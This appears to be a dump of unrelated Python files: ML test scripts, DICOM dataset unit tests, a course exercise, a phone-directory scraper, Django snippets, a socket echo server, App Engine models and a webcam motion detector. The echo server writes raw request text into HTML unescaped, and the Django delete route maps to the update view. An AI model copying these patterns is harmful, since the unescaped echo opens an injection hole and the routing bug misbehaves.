transform = init_aug(config.test_aug_configs)
key, params = config.data_config.popitem()
dataset = getattr(datasets, key)
testset = dataset(**params, mode='test', transform=transform, return_idx=True, return_size=True)
testloader = torch.utils.data.DataLoader(testset, batch_size=config.batch_size, num_workers=config.num_workers,
shuffle=False, pin_memory=True)
print('num_test = {}'.format(len(testset)))
net = init_net(config)
torch.cuda.empty_cache()
torch.backends.cudnn.benchmark = True
net.cuda()
net = encoding.parallel.DataParallelModel(net)
net = resume_state(config, net)
test()
|
import os
import gemicai.data_iterators as test
import torchvision
import unittest
raw_dicom_directory = os.path.join("..", "examples", "dicom", "CT")
raw_dicom_file_path = os.path.join(raw_dicom_directory, "325261597578315993471860132776680.dcm.gz")
wrong_dicom_file_path = os.path.join("..", "000001.gemset")
dicom_directory = os.path.join("..", "examples", "gemset", "CT")
dicom_data_set = os.path.join(dicom_directory, "000001.gemset")
class TestPickledDicomoDataSet(unittest.TestCase):
def test_init_correct_usage(self):
dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
self.assertIsInstance(dataset, test.PickledDicomoDataSet)
def test_init_wrong_label_counter_type(self):
with self.assertRaises(TypeError):
test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={},
label_counter_type=TestPickledDicomoDataSet)
def test_init_invalid_file_path(self):
with self.assertRaises(FileNotFoundError):
test.PickledDicomoDataSet(wrong_dicom_file_path, ["CT"], constraints={})
def test_init_file_has_wrong_type(self):
dataset = test.PickledDicomoDataSet(raw_dicom_file_path, ["CT"], constraints={})
with self.assertRaises(test.gem.pickle.UnpicklingError):
next(iter(dataset))
def test_init_wrong_labels_type(self):
with self.assertRaises(TypeError):
dataset = test.PickledDicomoDataSet(dicom_data_set, {"CT"}, constraints={})
def test_init_wrong_constraints_type(self):
with self.assertRaises(TypeError):
dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints=[])
def test_iter(self):
dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
dataset = iter(dataset)
self.assertIsInstance(dataset, test.PickledDicomoDataSet)
def test_next(self):
dataset = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
data = next(iter(dataset))
self.assertIsInstance(data, list)
def test_len(self):
dataset = iter(test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={}))
self.assertEqual(len(dataset), 0)
next(dataset)
self.assertEqual(len(dataset), 1)
next(dataset)
next(dataset)
self.assertEqual(len(dataset), 3)
def test_from_file_apply_invalid_transformation(self):
with self.assertRaises(Exception):
next(iter(test.PickledDicomoDataSet(dicom_data_set, ["CT"], transform=[], constraints={})))
def test_from_file_apply_valid_transformation(self):
t1 = torchvision.transforms.Compose([
torchvision.transforms.ToPILImage(),
torchvision.transforms.Resize((244, 244)),
torchvision.transforms.ToTensor()
])
data = next(iter(test.PickledDicomoDataSet(dicom_data_set, ["CT"], transform=t1, constraints={})))
self.assertIsInstance(data, list)
def test_subset_correct_usage(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
subset = data.subset({"Modality": "asd"})
with self.assertRaises(StopIteration):
next(iter(subset))
def test_subset_wrong_constraint_type(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
with self.assertRaises(TypeError):
subset = data.subset(("Modality", 1))
def test_can_be_parallelized(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
self.assertEqual(data.can_be_parallelized(), False)
def test_classes_correct_usage(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
self.assertIsInstance(data.classes("Modality"), list)
def test_classes_wrong_label_type(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.classes(["Modality"])
def test_summarize_correct_usage(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)
def test_summarize_wrong_label_type(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize(["Modality"], print_summary=False)
def test_summarize_wrong_constraints_type(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", [], print_summary=False)
def test_summarize_test_CT_constraint(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
summary_1 = data.summarize("Modality", print_summary=False)
summary_2 = data.summarize("BodyPartExamined", print_summary=False)
self.assertNotEqual(str(summary_1), str(summary_2))
def test_summarize_wrong_summary_type(self):
data = test.PickledDicomoDataSet(dicom_data_set, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", print_summary=None)
class TestPickledDicomoDataFolder(unittest.TestCase):
def test_init_correct_usage(self):
dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
self.assertIsInstance(dataset, test.PickledDicomoDataFolder)
def test_init_wrong_label_counter_type(self):
with self.assertRaises(TypeError):
test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={},
label_counter_type=TestPickledDicomoDataSet)
def test_init_invalid_directory_path(self):
with self.assertRaises(NotADirectoryError):
test.PickledDicomoDataFolder(os.path.join(dicom_directory, "asd"), ["CT"], constraints={})
def test_init_file_has_wrong_type(self):
dataset = test.PickledDicomoDataFolder(raw_dicom_directory, ["CT"], constraints={})
with self.assertRaises(test.gem.pickle.UnpicklingError):
next(iter(dataset))
def test_init_wrong_labels_type(self):
with self.assertRaises(TypeError):
dataset = test.PickledDicomoDataFolder(dicom_directory, {"CT"}, constraints={})
def test_init_wrong_constraints_type(self):
with self.assertRaises(TypeError):
dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints=[])
def test_iter(self):
dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
dataset = iter(dataset)
self.assertIsInstance(dataset, test.PickledDicomoDataFolder)
def test_next(self):
dataset = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
data = next(iter(dataset))
self.assertIsInstance(data, list)
def test_len(self):
dataset = iter(test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={}))
self.assertEqual(len(dataset), 0)
next(dataset)
self.assertEqual(len(dataset), 1)
next(dataset)
next(dataset)
self.assertEqual(len(dataset), 3)
def test_subset_correct_usage(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
subset = data.subset({"Modality": "asd"})
with self.assertRaises(StopIteration):
next(iter(subset))
def test_subset_wrong_constraint_type(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
subset = data.subset(("Modality", 1))
def test_iterate_over_all(self):
data = iter(test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={}))
with self.assertRaises(StopIteration):
while True:
next(data)
self.assertEqual(len(data), 49)
def test_can_be_parallelized(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
self.assertEqual(data.can_be_parallelized(), False)
def test_classes_correct_usage(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
self.assertIsInstance(data.classes("Modality"), list)
def test_classes_wrong_label_type(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.classes(["Modality"])
def test_summarize_correct_usage(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)
def test_summarize_wrong_label_type(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize(["Modality"], print_summary=False)
def test_summarize_wrong_constraints_type(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", [], print_summary=False)
def test_summarize_test_CT_constraint(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
summary_1 = data.summarize("Modality", print_summary=False)
summary_2 = data.summarize("BodyPartExamined", print_summary=False)
self.assertNotEqual(str(summary_1), str(summary_2))
def test_summarize_wrong_summary_type(self):
data = test.PickledDicomoDataFolder(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", print_summary=None)
class TestPickledDicomoFilePool(unittest.TestCase):
def test_init_correct_usage(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
self.assertIsInstance(data, test.PickledDicomoFilePool)
def test_init_wrong_label_counter_type(self):
with self.assertRaises(TypeError):
test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={},
label_counter_type=TestPickledDicomoDataSet)
def test_init_invalid_file_pool_path(self):
with self.assertRaises(FileNotFoundError):
test.PickledDicomoFilePool([os.path.join(dicom_directory, "asd", "000001.gemset")], ["CT"], constraints={})
def test_init_file_has_wrong_type(self):
with self.assertRaises(test.gem.pickle.UnpicklingError):
next(iter(test.PickledDicomoFilePool([raw_dicom_file_path], ["CT"], constraints={})))
def test_init_wrong_labels_type(self):
with self.assertRaises(TypeError):
dataset = test.PickledDicomoFilePool([dicom_data_set], {"CT"}, constraints={})
def test_init_wrong_constraints_type(self):
with self.assertRaises(TypeError):
dataset = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints=[])
def test_iter(self):
dataset = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
dataset = iter(dataset)
self.assertIsInstance(dataset, test.PickledDicomoFilePool)
def test_next(self):
dataset = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
data = next(iter(dataset))
self.assertIsInstance(data, list)
def test_len(self):
dataset = iter(test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={}))
self.assertEqual(len(dataset), 0)
next(dataset)
self.assertEqual(len(dataset), 1)
next(dataset)
next(dataset)
self.assertEqual(len(dataset), 3)
def test_subset_correct_usage(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
subset = data.subset({"Modality": "asd"})
with self.assertRaises(StopIteration):
next(iter(subset))
def test_subset_wrong_constraint_type(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
with self.assertRaises(TypeError):
subset = data.subset(("Modality", 1))
def test_iterate_over_all(self):
data = iter(test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={}))
with self.assertRaises(StopIteration):
while True:
next(data)
self.assertNotEqual(len(data), 0)
def test_can_be_parallelized(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
self.assertEqual(data.can_be_parallelized(), False)
def test_classes_correct_usage(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
self.assertIsInstance(data.classes("Modality"), list)
def test_classes_wrong_label_type(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
with self.assertRaises(TypeError):
data.classes(["Modality"])
def test_summarize_correct_usage(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)
def test_summarize_wrong_label_type(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize(["Modality"], print_summary=False)
def test_summarize_wrong_constraints_type(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", [], print_summary=False)
def test_summarize_test_CT_constraint(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
summary_1 = data.summarize("Modality", print_summary=False)
summary_2 = data.summarize("BodyPartExamined", print_summary=False)
self.assertNotEqual(str(summary_1), str(summary_2))
def test_summarize_wrong_summary_type(self):
data = test.PickledDicomoFilePool([dicom_data_set], ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", print_summary=None)
class TestConcurrentPickledDicomObjectTaskSplitter(unittest.TestCase):
def test_init_correct_usage(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
self.assertIsInstance(data, test.ConcurrentPickledDicomObjectTaskSplitter)
def test_init_wrong_label_counter_type(self):
with self.assertRaises(TypeError):
test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={},
label_counter_type=TestPickledDicomoDataSet)
def test_init_invalid_directory_path(self):
test.ConcurrentPickledDicomObjectTaskSplitter(os.path.join(dicom_directory, "asd"), ["CT"], constraints={})
def test_init_wrong_labels_type(self):
with self.assertRaises(TypeError):
dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, {"CT"}, constraints={})
def test_init_wrong_constraints_type(self):
with self.assertRaises(TypeError):
dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints=[])
def test_iter(self):
dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
dataset = iter(dataset)
self.assertIsInstance(dataset, test.PickledDicomoFilePool)
def test_next(self):
dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
data = next(iter(dataset))
self.assertIsInstance(data, list)
def test_len(self):
dataset = iter(test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={}))
self.assertEqual(len(dataset), 0)
next(dataset)
self.assertEqual(len(dataset), 1)
next(dataset)
next(dataset)
self.assertEqual(len(dataset), 3)
def test_subset_correct_usage(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
subset = data.subset({"Modality": "asd"})
with self.assertRaises(StopIteration):
next(iter(subset))
def test_subset_wrong_constraint_type(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
subset = data.subset(("Modality", 1))
def test_iterate_over_all(self):
data = iter(test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={}))
with self.assertRaises(StopIteration):
while True:
next(data)
self.assertNotEqual(len(data), 0)
def test_can_be_parallelized(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
self.assertEqual(data.can_be_parallelized(), True)
def test_classes_correct_usage(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
self.assertIsInstance(data.classes("Modality"), list)
def test_classes_wrong_label_type(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.classes(["Modality"])
def test_summarize_correct_usage(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)
def test_summarize_wrong_label_type(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize(["Modality"], print_summary=False)
def test_summarize_wrong_constraints_type(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", [], print_summary=False)
def test_summarize_test_CT_constraint(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
summary_1 = data.summarize("Modality", print_summary=False)
summary_2 = data.summarize("BodyPartExamined", print_summary=False)
self.assertNotEqual(str(summary_1), str(summary_2))
def test_summarize_wrong_summary_type(self):
data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
with self.assertRaises(TypeError):
data.summarize("Modality", print_summary=None)
class TestDicomoDataset(unittest.TestCase):
def test_from_file_correct_usage(self):
dataset = test.DicomoDataset.from_file(dicom_data_set, ["CT"])
self.assertIsInstance(dataset, test.PickledDicomoDataSet)
def test_from_file_wrong_file_path(self):
with self.assertRaises(FileNotFoundError):
test.DicomoDataset.from_file(wrong_dicom_file_path, ["CT"])
def test_from_directory_correct_usage(self):
dataset = test.DicomoDataset.from_directory(dicom_directory, ["CT"])
self.assertIsInstance(dataset, test.ConcurrentPickledDicomObjectTaskSplitter)
def test_from_directory_file_wrong_directory_path(self):
with self.assertRaises(NotADirectoryError):
test.DicomoDataset.from_directory(os.path.join(dicom_directory, "asd"), ["CT"])
def test_get_dicomo_dataset_correct_usage_file(self):
dataset = test.DicomoDataset.get_dicomo_dataset(dicom_data_set)
self.assertIsInstance(dataset, test.PickledDicomoDataSet)
def test_get_dicomo_dataset_correct_usage_directory(self):
dataset = test.DicomoDataset.get_dicomo_dataset(dicom_directory)
self.assertIsInstance(dataset, test.ConcurrentPickledDicomObjectTaskSplitter)
def test_get_dicomo_dataset_wrong_directory_path(self):
with self.assertRaises(NotADirectoryError):
test.DicomoDataset.get_dicomo_dataset(wrong_dicom_file_path)
if __name__ == '__main__':
unittest.main()
|
# This code is the same we have discussed in CSV file.
import unicodecsv
enrollments_filename = '/datasets/ud170/udacity-students/enrollments.csv'
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open(enrollments_filename, 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
with open(enrollments_filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
enrollments = list(reader)
# Problem
### Write code similar to the above to load the engagement
### and submission data. The data is stored in files with
### the given filenames. Then print the first row of each
### table to make sure that your code works. You can use the
### "Test Run" button to see the output of your code.
engagement_filename = '/datasets/ud170/udacity-students/daily_engagement.csv'
submissions_filename = '/datasets/ud170/udacity-students/project_submissions.csv'
daily_engagement = None # Replace this with your code
project_submissions = None # Replace this with your code
# Solution
import unicodecsv
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
enrollments = read_csv('enrollments.csv')
daily_engagement = read_csv('daily_engagement.csv')
project_submissions = read_csv('project_submissions.csv')
|
from __future__ import annotations
from copy import deepcopy
from typing import TypeVar, TYPE_CHECKING, List, cast, Any, NoReturn, Optional
from errors.not_impl_error import NotImplError
from keywords import *
from position import Position
if TYPE_CHECKING:
from context import Context
from lang_types.lang_bool import LangBool
CompType = LangBool
T = TypeVar("T", bound="LangType")
class LangType:
def __init__(
self,
type_name: str,
pos_start: Position,
pos_end: Position,
context: Context,
deep_copied: Optional[List[str]] = None,
):
self.pos_start = pos_start
self.pos_end = pos_end
self.context = context
self.deep_copied = deep_copied if deep_copied else []
self.type_name = type_name
def set_pos(self: T, pos_start: Position, pos_end: Position) -> T:
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self: T, context: Context) -> T:
self.context = context
return self
def copy(self: T) -> T:
cls = type(self)
result = cast(T, cls.__new__(cls))
for key, value in self.__dict__.items():
if key in self.deep_copied:
setattr(result, key, deepcopy(value))
else:
setattr(result, key, value)
return result
def added_to(self, other: LangType) -> OperType:
return self._not_impl("+")
def multiplied_by(self, other: LangType) -> OperType:
return self._not_impl("*")
def subtracted_by(self, other: LangType) -> OperType:
return self._not_impl("-")
def divided_by(self, other: LangType) -> OperType:
return self._not_impl("/")
def raised_to_power_by(self, other: LangType) -> OperType:
return self._not_impl("^")
def get_comparison_eq(self, other: LangType) -> CompType:
return self._not_impl("==")
def get_comparison_ne(self, other: LangType) -> CompType:
return self._not_impl("!=")
def get_comparison_lt(self, other: LangType) -> CompType:
return self._not_impl("<")
def get_comparison_gt(self, other: LangType) -> CompType:
return self._not_impl(">")
def get_comparison_lte(self, other: LangType) -> CompType:
return self._not_impl("<=")
def get_comparison_gte(self, other: LangType) -> CompType:
return self._not_impl(">=")
def anded_by(self, other: LangType) -> CompType:
return self._not_impl(f'KEYWORD:{KEYWORDS["AND"]}')
def ored_by(self, other: LangType) -> CompType:
return self._not_impl(f'KEYWORD:{KEYWORDS["OR"]}')
def notted(self) -> CompType:
return self._not_impl(f'KEYWORD:{KEYWORDS["NOT"]}')
def call(self, context: Context, args: List[LangType]) -> LangType:
raise NotImplError(self.pos_start, self.pos_end, "Call")
def _not_impl(self, error_msg: str) -> NoReturn:
raise NotImplError(self.pos_start, self.pos_end, error_msg)
@property
def value(self) -> Any:
return None
OperType = LangType
|
Q = int(input("Quantidade de jogos (1 / 2): "))
j1 = float(input("Valor do jogo 1: "))
if(Q == 2):
j2 = float(input("Valor do jogo 2: "))
total = j1 + (j2 * 0.75)
else:
total = j1
print(round(total, 2)) |
from bs4 import BeautifulSoup
import csv
import requests
import re
def scrape(next_page_url):
headers = {'User-Agent': 'Mozilla/5.0'}
response = requests.get(next_page_url, headers=headers)
soup = BeautifulSoup(response.text, "html.parser")
return soup
def getDetailsInPage(url):
soup = scrape(url)
total = int(soup.find('div',{'class':'listings-title'}).find('h1').text.split(" ")[0][0:-1])+1
print total
if(total>100):
total =100
for i in range(1,101):
j = str(i)
link = url+'&page='+j
soup = scrape(link)
divs = soup.findAll('div',{'class':'local-listing'})
for div in divs:
name = div.find('h2').find('a').text
number = div.find('a', {'class': 'number'})
if(number != None):
number = number.text
else:
number=''
address = div.find('span',{'class':'address'}).text
print '"'+name+'"'+","+'"'+number+'"'+","+'"'+address+'"'
url = "https://tel.local.ch/en/q?what=y&where="
url1 = "https://tel.local.ch/en/q?what=z&where="
getDetailsInPage(url)
getDetailsInPage(url1)
|
from django.conf.urls import patterns, url
from animals import views
urlpatterns = patterns('',
url(r'^$',
views.Index.as_view(),
name='index'),
url(r'^(?P<pk>\d+)/$',
views.AnimalDetail.as_view(),
name='detail'),
url(r'^(?P<pk>\d+)/update/$',
views.AnimalUpdate.as_view(),
name='update'),
url(r'^create/$',
views.AnimalCreate.as_view(),
name='create'),
url(r'^(?P<pk>\d+)/delete/$',
views.AnimalUpdate.as_view(),
name='delete'),
)
|
from django import forms
from django.forms import ModelForm
from .models import Order
class OrderUpdate(forms.ModelForm):
class Meta:
model = Order
fields = ('end_at', 'plated_end_at')
widgets = {
'end_at': forms.DateTimeInput(attrs={'class':'form-control'}),
'plated_end_at': forms.DateTimeInput(attrs={'class':'form-control'}),
}
|
# coding:utf-8
import socket
T1="""HTTP/1.1 200 OK\r\n\r\n
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Null</title>
</head>
<body>
"""
T2="""
</body>
</html>
"""
def handle_request(client):
buf = client.recv(1024)
print buf
T3=str(buf).replace('\n','<br />')
client.send(T1+T3+T2)
#client.send("Hello, World")
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 8080))
sock.listen(5)
while True:
connection, address = sock.accept()
handle_request(connection)
connection.close()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.ext import db
#Define some data models
class place_address(db.Model):
# This is the master dictionary containing all qr-codes and contact details
owner = db.UserProperty(auto_current_user_add=True)
user_id = db.StringProperty(multiline=False)
Date_created = db.DateTimeProperty(auto_now_add=True)
Key_Name_String = db.StringProperty(multiline=False)
# These are the existing fields in the card
First_Name = db.StringProperty(multiline=False)
Middle_Name = db.StringProperty(multiline=False)
Last_Name = db.StringProperty(multiline=False)
Organisation = db.StringProperty(multiline=False)
W_address_line_1 = db.StringProperty(multiline=False)
W_address_line_2 = db.StringProperty(multiline=False)
W_address_Post_Town = db.StringProperty(multiline=False)
W_address_County = db.StringProperty(multiline=False)
W_address_Post_Code = db.StringProperty(multiline=False)
W_address_Country = db.StringProperty(multiline=False)
Email_address = db.StringProperty(multiline=False)
Work_Phone = db.StringProperty(multiline=False)
Home_Phone = db.StringProperty(multiline=False)
Mobile_Phone = db.StringProperty(multiline=False)
Web_url = db.StringProperty(multiline=False)
#Text_message = db.StringProperty(multiline=True)
# String property is limited to less than 500 characters. Text has no limit
Text_message = db.TextProperty()
Auto_forward = db.StringProperty(multiline=False)
Google_analytics = db.StringProperty(multiline=False)
Stat_counter = db.StringProperty(multiline=False)
# These are the new fields in the card
Tel1 = db.StringProperty(multiline=False)
Tel2 = db.StringProperty(multiline=False)
Tel3 = db.StringProperty(multiline=False)
CardID = db.StringProperty(multiline=False)
Cardtitle = db.StringProperty(multiline=False)
Datesold = db.StringProperty(multiline=False)
Datecreated = db.StringProperty(multiline=False)
Datewarrexp = db.StringProperty(multiline=False)
Day = db.StringProperty(multiline=False)
Dutylist = db.StringProperty(multiline=False)
Email2 = db.StringProperty(multiline=False)
Endate = db.StringProperty(multiline=False)
ItemID = db.StringProperty(multiline=False)
LabelID = db.StringProperty(multiline=False)
Latlong = db.StringProperty(multiline=False)
Locationname = db.StringProperty(multiline=False)
Make = db.StringProperty(multiline=False)
Offers = db.StringProperty(multiline=False)
Persontitle = db.StringProperty(multiline=False)
Price1 = db.StringProperty(multiline=False)
Price2 = db.StringProperty(multiline=False)
Price3 = db.StringProperty(multiline=False)
Qualifications = db.StringProperty(multiline=False)
Reminderdate = db.StringProperty(multiline=False)
Spareblank1 = db.StringProperty(multiline=False)
Spareblank2 = db.StringProperty(multiline=False)
Sparebusiness1 = db.StringProperty(multiline=False)
Sparebusiness2 = db.StringProperty(multiline=False)
Spareduty1 = db.StringProperty(multiline=False)
Spareduty2 = db.StringProperty(multiline=False)
Spareevent1 = db.StringProperty(multiline=False)
Spareevent2 = db.StringProperty(multiline=False)
Sparegoto1 = db.StringProperty(multiline=False)
Sparegoto2 = db.StringProperty(multiline=False)
SpareICE1 = db.StringProperty(multiline=False)
SpareICE2 = db.StringProperty(multiline=False)
Sparelocation1 = db.StringProperty(multiline=False)
Sparelocation2 = db.StringProperty(multiline=False)
Sparemembership1 = db.StringProperty(multiline=False)
Sparemembership2 = db.StringProperty(multiline=False)
Spareoffer1 = db.StringProperty(multiline=False)
Spareoffer2 = db.StringProperty(multiline=False)
Spareservice1 = db.StringProperty(multiline=False)
Spareservice2 = db.StringProperty(multiline=False)
Sparestock1 = db.StringProperty(multiline=False)
Sparestock2 = db.StringProperty(multiline=False)
Sparetour1 = db.StringProperty(multiline=False)
Sparetour2 = db.StringProperty(multiline=False)
Startdate = db.StringProperty(multiline=False)
Status = db.StringProperty(multiline=False)
Itemlist = db.StringProperty(multiline=False)
Type = db.StringProperty(multiline=False)
URL2 = db.StringProperty(multiline=False)
URLsocialnets = db.StringProperty(multiline=False)
# These are the mini web fields
mini_web_01 = db.StringProperty(multiline=False)
mini_web_02 = db.StringProperty(multiline=False)
mini_web_03 = db.StringProperty(multiline=False)
mini_web_04 = db.StringProperty(multiline=False)
mini_web_05 = db.StringProperty(multiline=False)
mini_web_06 = db.StringProperty(multiline=False)
mini_web_07 = db.StringProperty(multiline=False)
mini_web_08 = db.StringProperty(multiline=False)
mini_web_09 = db.StringProperty(multiline=False)
mini_web_10 = db.StringProperty(multiline=False)
scan_counter = db.StringProperty(multiline=False)
class account_manager(db.Model):
owner = db.UserProperty(auto_current_user_add=True)
nickname = db.StringProperty(multiline=False)
email = db.StringProperty(multiline=False)
user_id = db.StringProperty(multiline=False)
Date_created = db.DateTimeProperty(auto_now_add=True)
account_valid = db.BooleanProperty(False)
suspend_account = db.BooleanProperty(False)
opt_in_to_contact = db.BooleanProperty(False)
page_limit = db.StringProperty(multiline=False)
renewal_date = db.DateTimeProperty()
free_trial_end = db.DateTimeProperty()
total_scan_counter = db.StringProperty(multiline=False)
renewal_confirm_date = db.DateTimeProperty()
success_message = db.StringProperty(multiline=False)
class q_action_manager(db.Model):
system_scan_counter = db.StringProperty(multiline=False)
|
import cv2, time, pandas
from datetime import datetime
first_frame = None
statu_list = [None, None]
times = []
df = pandas.DataFrame(columns=["Start" , "End"])
video = cv2.VideoCapture(0)
while True:
check, frame = video.read()
statu = 0
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (21,21), 0)
if first_frame is None:
first_frame = gray
continue
statu = 1
detla_frame = cv2.absdiff(first_frame, gray)
thresh_delta = cv2.threshold(detla_frame, 30 , 255, cv2.THRESH_BINARY)[1]
thresh_delta = cv2.dilate(thresh_delta, None , iterations= 0)
(cnts,_) = cv2.findContours(thresh_delta.copy(), cv2.RETR_EXTERNAL ,cv2.CHAIN_APPROX_SIMPLE)
for contour in cnts:
if cv2.contourArea(contour) < 100:
continue
(x,y,w,h) = cv2.boundingRect(contour)
cv2.rectangle(frame , (x,y) , (x+w , y+h), (0,255,0),3)
statu_list.append(statu)
statu_list = statu_list[-2:]
if statu_list[-1] == 1 and statu_list[-2] ==0:
times.append(datetime.now())
if statu_list[-1] == 0 and statu_list[-2] ==1:
times.append(datetime.now())
cv2.imshow("FRAME" , frame)
cv2.imshow("GRAY", gray)
cv2.imshow("Delta" ,detla_frame)
cv2.imshow("thresh",thresh_delta)
print(statu_list)
print(times)
# for i in range(0, len(times), 2):
# df = df.append({"Start" : times[i], "End": times[i+1], ignore_index=True})
# df.to_csv("Times.csv")
key = cv2.waitKey(1)
if key == ord("q"):
break
video.release()
cv2.destroyAllWindows()
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# import cv2, time
# video = cv2.VideoCapture(0)
# first_frame = None
# while True:
# check, frame = video.read()
